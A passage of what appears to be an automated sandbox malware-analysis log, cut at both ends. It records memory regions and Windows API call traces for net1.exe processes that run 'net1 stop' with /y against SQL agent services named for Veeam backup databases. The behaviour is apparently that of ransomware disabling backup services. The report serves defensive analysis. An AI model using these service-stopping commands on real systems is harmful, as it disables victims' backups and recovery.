0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10686 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 10687 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 10688 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 10689 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 10690 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 10927 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 796 os_tid = 0x131c [0113.298] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20ff30 | out: lpSystemTimeAsFileTime=0x20ff30*(dwLowDateTime=0xf8ae0270, dwHighDateTime=0x1d48689)) [0113.298] GetCurrentProcessId () returned 0x1320 [0113.298] GetCurrentThreadId () returned 0x131c [0113.298] GetTickCount () returned 0x26057 [0113.298] QueryPerformanceCounter (in: lpPerformanceCount=0x20ff38 | out: lpPerformanceCount=0x20ff38*=1816021700000) returned 1 [0113.300] GetModuleHandleW (lpModuleName=0x0) returned 0xff3d0000 [0113.300] __set_app_type (_Type=0x1) [0113.300] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff3e9c9c) returned 0x0 [0113.300] __getmainargs (in: _Argc=0xff3f4780, _Argv=0xff3f4790, _Env=0xff3f4788, _DoWildCard=0, _StartInfo=0xff3f479c | out: _Argc=0xff3f4780, _Argv=0xff3f4790, _Env=0xff3f4788) returned 0 [0113.301] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0113.301] GetConsoleOutputCP () returned 0x1b5 [0113.643] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff3fcec0 | out: lpCPInfo=0xff3fcec0) returned 1 [0113.643] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0113.645] sprintf_s (in: _DstBuf=0x20fed8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0113.645] setlocale (category=0, locale=".437") returned="English_United States.437" [0113.646] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0113.646] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0113.646] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$VEEAMSQL2008R2 /y" [0113.646] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x20fc70, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0113.646] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0113.647] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x20fec8 | out: Buffer=0x20fec8*=0x2ec0f0) returned 0x0 [0113.647] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x20fec8 | out: Buffer=0x20fec8*=0x2ec110) returned 0x0 [0113.647] _fileno (_File=0x7fefdba2a80) returned 0 [0113.647] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0113.647] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0113.647] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0113.647] _wcsicmp (_String1="config", _String2="stop") returned -16 [0113.647] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0113.647] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0113.647] _wcsicmp (_String1="file", _String2="stop") returned -13 [0113.647] _wcsicmp (_String1="files", _String2="stop") returned -13 [0113.647] _wcsicmp (_String1="group", _String2="stop") returned -12 [0113.647] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0113.647] _wcsicmp (_String1="help", _String2="stop") returned -11 [0113.647] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0113.647] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0113.647] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0113.647] _wcsicmp (_String1="session", _String2="stop") returned -15 [0113.647] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0113.647] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0113.647] _wcsicmp (_String1="share", _String2="stop") returned -12 [0113.647] _wcsicmp (_String1="start", _String2="stop") returned -14 [0113.647] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0113.647] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0113.647] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0113.647] _wcsicmp (_String1="accounts", _String2="SQLAgent$VEEAMSQL2008R2") returned -18 [0113.647] _wcsicmp (_String1="computer", _String2="SQLAgent$VEEAMSQL2008R2") returned -16 [0113.647] _wcsicmp (_String1="config", _String2="SQLAgent$VEEAMSQL2008R2") returned -16 [0113.647] _wcsicmp (_String1="continue", _String2="SQLAgent$VEEAMSQL2008R2") returned -16 [0113.647] _wcsicmp (_String1="cont", _String2="SQLAgent$VEEAMSQL2008R2") returned -16 [0113.647] _wcsicmp (_String1="file", _String2="SQLAgent$VEEAMSQL2008R2") returned -13 [0113.647] _wcsicmp (_String1="files", _String2="SQLAgent$VEEAMSQL2008R2") returned -13 [0113.648] _wcsicmp (_String1="group", _String2="SQLAgent$VEEAMSQL2008R2") returned -12 [0113.648] _wcsicmp (_String1="groups", _String2="SQLAgent$VEEAMSQL2008R2") returned -12 [0113.648] _wcsicmp (_String1="help", _String2="SQLAgent$VEEAMSQL2008R2") returned -11 [0113.648] _wcsicmp (_String1="helpmsg", _String2="SQLAgent$VEEAMSQL2008R2") returned -11 [0113.648] _wcsicmp (_String1="localgroup", _String2="SQLAgent$VEEAMSQL2008R2") returned -7 [0113.648] _wcsicmp (_String1="pause", _String2="SQLAgent$VEEAMSQL2008R2") returned -3 [0113.648] _wcsicmp (_String1="session", _String2="SQLAgent$VEEAMSQL2008R2") returned -12 [0113.648] _wcsicmp (_String1="sessions", _String2="SQLAgent$VEEAMSQL2008R2") returned -12 [0113.648] _wcsicmp (_String1="sess", _String2="SQLAgent$VEEAMSQL2008R2") returned -12 [0113.648] _wcsicmp (_String1="share", _String2="SQLAgent$VEEAMSQL2008R2") returned -9 [0113.648] _wcsicmp (_String1="start", _String2="SQLAgent$VEEAMSQL2008R2") returned 3 [0113.648] _wcsicmp (_String1="stats", _String2="SQLAgent$VEEAMSQL2008R2") returned 3 [0113.648] _wcsicmp (_String1="statistics", _String2="SQLAgent$VEEAMSQL2008R2") returned 3 [0113.648] _wcsicmp (_String1="stop", _String2="SQLAgent$VEEAMSQL2008R2") returned 3 [0113.648] _wcsicmp (_String1="time", _String2="SQLAgent$VEEAMSQL2008R2") returned 1 [0113.648] _wcsicmp (_String1="user", _String2="SQLAgent$VEEAMSQL2008R2") returned 2 [0113.648] _wcsicmp (_String1="users", _String2="SQLAgent$VEEAMSQL2008R2") returned 2 [0113.648] _wcsicmp (_String1="msg", _String2="SQLAgent$VEEAMSQL2008R2") returned -6 [0113.648] _wcsicmp (_String1="messenger", _String2="SQLAgent$VEEAMSQL2008R2") returned -6 [0113.648] _wcsicmp (_String1="receiver", _String2="SQLAgent$VEEAMSQL2008R2") returned -1 [0113.648] _wcsicmp (_String1="rcv", _String2="SQLAgent$VEEAMSQL2008R2") returned -1 [0113.648] _wcsicmp (_String1="netpopup", _String2="SQLAgent$VEEAMSQL2008R2") returned -5 [0113.648] _wcsicmp (_String1="redirector", _String2="SQLAgent$VEEAMSQL2008R2") returned -1 [0113.648] _wcsicmp (_String1="redir", _String2="SQLAgent$VEEAMSQL2008R2") returned -1 [0113.648] _wcsicmp (_String1="rdr", _String2="SQLAgent$VEEAMSQL2008R2") returned -1 [0113.648] _wcsicmp (_String1="workstation", _String2="SQLAgent$VEEAMSQL2008R2") returned 4 [0113.648] _wcsicmp (_String1="work", _String2="SQLAgent$VEEAMSQL2008R2") returned 4 [0113.648] _wcsicmp (_String1="wksta", _String2="SQLAgent$VEEAMSQL2008R2") returned 4 [0113.648] _wcsicmp (_String1="prdr", _String2="SQLAgent$VEEAMSQL2008R2") returned -3 [0113.648] _wcsicmp (_String1="devrdr", _String2="SQLAgent$VEEAMSQL2008R2") returned -15 [0113.648] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAgent$VEEAMSQL2008R2") returned -7 [0113.648] _wcsicmp (_String1="server", _String2="SQLAgent$VEEAMSQL2008R2") returned -12 [0113.648] _wcsicmp (_String1="svr", _String2="SQLAgent$VEEAMSQL2008R2") returned 5 [0113.648] _wcsicmp (_String1="srv", _String2="SQLAgent$VEEAMSQL2008R2") returned 1 [0113.648] _wcsicmp (_String1="lanmanserver", _String2="SQLAgent$VEEAMSQL2008R2") returned -7 [0113.648] _wcsicmp (_String1="alerter", _String2="SQLAgent$VEEAMSQL2008R2") returned -18 [0113.648] _wcsicmp (_String1="netlogon", _String2="SQLAgent$VEEAMSQL2008R2") returned -5 [0113.648] _wcsupr (in: _String="SQLAgent$VEEAMSQL2008R2" | out: _String="SQLAGENT$VEEAMSQL2008R2") returned="SQLAGENT$VEEAMSQL2008R2" [0113.649] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x2ece20 [0113.652] GetServiceKeyNameW (in: hSCManager=0x2ece20, lpDisplayName="SQLAGENT$VEEAMSQL2008R2", lpServiceName=0xff3f5750, lpcchBuffer=0x20fde8 | out: lpServiceName="", lpcchBuffer=0x20fde8) returned 0 [0113.653] _wcsicmp (_String1="msg", _String2="SQLAGENT$VEEAMSQL2008R2") returned -6 [0113.653] _wcsicmp (_String1="messenger", _String2="SQLAGENT$VEEAMSQL2008R2") returned -6 [0113.653] _wcsicmp (_String1="receiver", _String2="SQLAGENT$VEEAMSQL2008R2") returned -1 [0113.653] _wcsicmp (_String1="rcv", _String2="SQLAGENT$VEEAMSQL2008R2") returned -1 [0113.653] _wcsicmp (_String1="redirector", _String2="SQLAGENT$VEEAMSQL2008R2") returned -1 [0113.653] _wcsicmp (_String1="redir", _String2="SQLAGENT$VEEAMSQL2008R2") returned -1 [0113.653] _wcsicmp (_String1="rdr", _String2="SQLAGENT$VEEAMSQL2008R2") returned -1 [0113.653] _wcsicmp (_String1="workstation", _String2="SQLAGENT$VEEAMSQL2008R2") returned 4 [0113.653] _wcsicmp (_String1="work", _String2="SQLAGENT$VEEAMSQL2008R2") returned 4 [0113.653] _wcsicmp (_String1="wksta", _String2="SQLAGENT$VEEAMSQL2008R2") returned 4 [0113.654] _wcsicmp (_String1="prdr", _String2="SQLAGENT$VEEAMSQL2008R2") returned -3 [0113.654] _wcsicmp (_String1="devrdr", _String2="SQLAGENT$VEEAMSQL2008R2") returned -15 [0113.654] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAGENT$VEEAMSQL2008R2") returned -7 [0113.654] _wcsicmp (_String1="server", _String2="SQLAGENT$VEEAMSQL2008R2") returned -12 [0113.654] _wcsicmp (_String1="svr", _String2="SQLAGENT$VEEAMSQL2008R2") returned 5 [0113.654] _wcsicmp (_String1="srv", _String2="SQLAGENT$VEEAMSQL2008R2") returned 1 [0113.654] _wcsicmp (_String1="lanmanserver", _String2="SQLAGENT$VEEAMSQL2008R2") returned -7 [0113.654] _wcsicmp (_String1="alerter", _String2="SQLAGENT$VEEAMSQL2008R2") returned -18 [0113.654] _wcsicmp (_String1="netlogon", _String2="SQLAGENT$VEEAMSQL2008R2") returned -5 [0113.654] NetServiceControl (in: servername=0x0, service="SQLAGENT$VEEAMSQL2008R2", opcode=0x0, arg=0x0, bufptr=0x20fdf0 | out: bufptr=0x20fdf0) returned 0x889 [0113.654] wcscpy_s (in: _Destination=0xff3f80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0113.654] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0113.655] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff3f5b50, nSize=0x800, Arguments=0xff3f7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0113.656] GetFileType (hFile=0xb) returned 0x2 [0113.656] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x20fcb8 | out: lpMode=0x20fcb8) returned 1 [0113.657] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3f5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x20fcb0, lpReserved=0x0 | out: lpBuffer=0xff3f5b50*, lpNumberOfCharsWritten=0x20fcb0*=0x1e) returned 1 [0113.657] GetFileType (hFile=0xb) returned 0x2 [0113.657] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x20fcb8 | out: lpMode=0x20fcb8) returned 1 [0113.657] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3d1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x20fcb0, lpReserved=0x0 | out: lpBuffer=0xff3d1efc*, lpNumberOfCharsWritten=0x20fcb0*=0x2) returned 1 [0113.657] _ultow (in: _Dest=0x889, _Radix=2161952 | out: _Dest=0x889) returned="2185" [0113.658] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff3f5b50, nSize=0x800, Arguments=0xff3f7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0113.658] GetFileType (hFile=0xb) returned 0x2 [0113.658] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x20fcb8 | out: lpMode=0x20fcb8) returned 1 [0113.658] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3f5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x20fcb0, lpReserved=0x0 | out: lpBuffer=0xff3f5b50*, lpNumberOfCharsWritten=0x20fcb0*=0x34) returned 1 [0113.658] GetFileType (hFile=0xb) returned 0x2 [0113.658] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x20fcb8 | out: lpMode=0x20fcb8) returned 1 [0113.659] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3d1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x20fcb0, lpReserved=0x0 | out: lpBuffer=0xff3d1efc*, lpNumberOfCharsWritten=0x20fcb0*=0x2) returned 1 [0113.659] NetApiBufferFree (Buffer=0x2ec0f0) returned 0x0 [0113.659] NetApiBufferFree (Buffer=0x2ec110) returned 0x0 [0113.659] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$VEEAMSQL2008R2 /y" [0113.659] exit (_Code=2) Process: id = "296" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x65bd5000" os_pid = "0xba4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "288" os_parent_pid = "0xd6c" cmd_line = "C:\\Windows\\system32\\net1 stop SQLAgent$VEEAMSQL2012 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10691 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10692 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10693 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10694 start_va = 0x170000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 10695 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10696 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 10697 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10698 start_va = 0xff3d0000 end_va = 0xff402fff entry_point = 0xff3d0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 10699 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10700 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 10701 start_va = 0x7fffffd7000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 10702 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 10703 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 10704 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10705 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10706 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10707 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 10708 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10709 start_va = 0x370000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 10710 start_va = 0x480000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 10711 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 10712 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 10713 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 10714 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 10715 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 10716 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 10717 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 10718 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 10719 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 10720 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 10721 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 10722 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 10723 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10724 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 10725 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 10726 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 10727 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 10728 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 10928 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 797 os_tid = 0xb94 [0113.338] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1ef930 | out: lpSystemTimeAsFileTime=0x1ef930*(dwLowDateTime=0xf8b2c530, dwHighDateTime=0x1d48689)) [0113.338] GetCurrentProcessId () returned 0xba4 [0113.338] GetCurrentThreadId () returned 0xb94 [0113.338] GetTickCount () returned 0x26076 [0113.338] QueryPerformanceCounter (in: lpPerformanceCount=0x1ef938 | out: lpPerformanceCount=0x1ef938*=1816025700000) returned 1 [0113.340] GetModuleHandleW (lpModuleName=0x0) returned 0xff3d0000 [0113.340] __set_app_type (_Type=0x1) [0113.340] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff3e9c9c) returned 0x0 [0113.340] __getmainargs (in: _Argc=0xff3f4780, _Argv=0xff3f4790, _Env=0xff3f4788, _DoWildCard=0, _StartInfo=0xff3f479c | out: _Argc=0xff3f4780, _Argv=0xff3f4790, _Env=0xff3f4788) returned 0 [0113.340] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0113.340] GetConsoleOutputCP () returned 0x1b5 [0113.663] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff3fcec0 | out: lpCPInfo=0xff3fcec0) returned 1 [0113.663] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0113.665] sprintf_s (in: _DstBuf=0x1ef8d8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0113.665] setlocale (category=0, locale=".437") returned="English_United States.437" [0113.666] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0113.666] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0113.666] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$VEEAMSQL2012 /y" [0113.666] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1ef670, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0113.667] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0113.667] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1ef8c8 | out: Buffer=0x1ef8c8*=0x284d60) returned 0x0 [0113.667] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1ef8c8 | out: Buffer=0x1ef8c8*=0x28c130) returned 0x0 [0113.667] _fileno (_File=0x7fefdba2a80) returned 0 [0113.667] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0113.667] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0113.667] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0113.667] _wcsicmp (_String1="config", _String2="stop") returned -16 [0113.667] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0113.667] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0113.667] _wcsicmp (_String1="file", _String2="stop") returned -13 [0113.667] _wcsicmp (_String1="files", _String2="stop") returned -13 [0113.667] _wcsicmp (_String1="group", _String2="stop") returned -12 [0113.667] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0113.667] _wcsicmp (_String1="help", _String2="stop") returned -11 [0113.667] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0113.667] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0113.667] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0113.667] _wcsicmp (_String1="session", _String2="stop") returned -15 [0113.667] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0113.667] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0113.667] _wcsicmp (_String1="share", _String2="stop") returned -12 [0113.667] _wcsicmp (_String1="start", _String2="stop") returned -14 [0113.667] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0113.667] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0113.667] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0113.667] _wcsicmp (_String1="accounts", _String2="SQLAgent$VEEAMSQL2012") returned -18 [0113.667] _wcsicmp (_String1="computer", _String2="SQLAgent$VEEAMSQL2012") returned -16 [0113.668] _wcsicmp (_String1="config", _String2="SQLAgent$VEEAMSQL2012") returned -16 [0113.668] _wcsicmp (_String1="continue", _String2="SQLAgent$VEEAMSQL2012") returned -16 [0113.668] _wcsicmp (_String1="cont", _String2="SQLAgent$VEEAMSQL2012") returned -16 [0113.668] _wcsicmp (_String1="file", _String2="SQLAgent$VEEAMSQL2012") returned -13 [0113.668] _wcsicmp (_String1="files", _String2="SQLAgent$VEEAMSQL2012") returned -13 [0113.668] _wcsicmp (_String1="group", _String2="SQLAgent$VEEAMSQL2012") returned -12 [0113.668] _wcsicmp (_String1="groups", _String2="SQLAgent$VEEAMSQL2012") returned -12 [0113.668] _wcsicmp (_String1="help", _String2="SQLAgent$VEEAMSQL2012") returned -11 [0113.668] _wcsicmp (_String1="helpmsg", _String2="SQLAgent$VEEAMSQL2012") returned -11 [0113.668] _wcsicmp (_String1="localgroup", _String2="SQLAgent$VEEAMSQL2012") returned -7 [0113.668] _wcsicmp (_String1="pause", _String2="SQLAgent$VEEAMSQL2012") returned -3 [0113.668] _wcsicmp (_String1="session", _String2="SQLAgent$VEEAMSQL2012") returned -12 [0113.668] _wcsicmp (_String1="sessions", 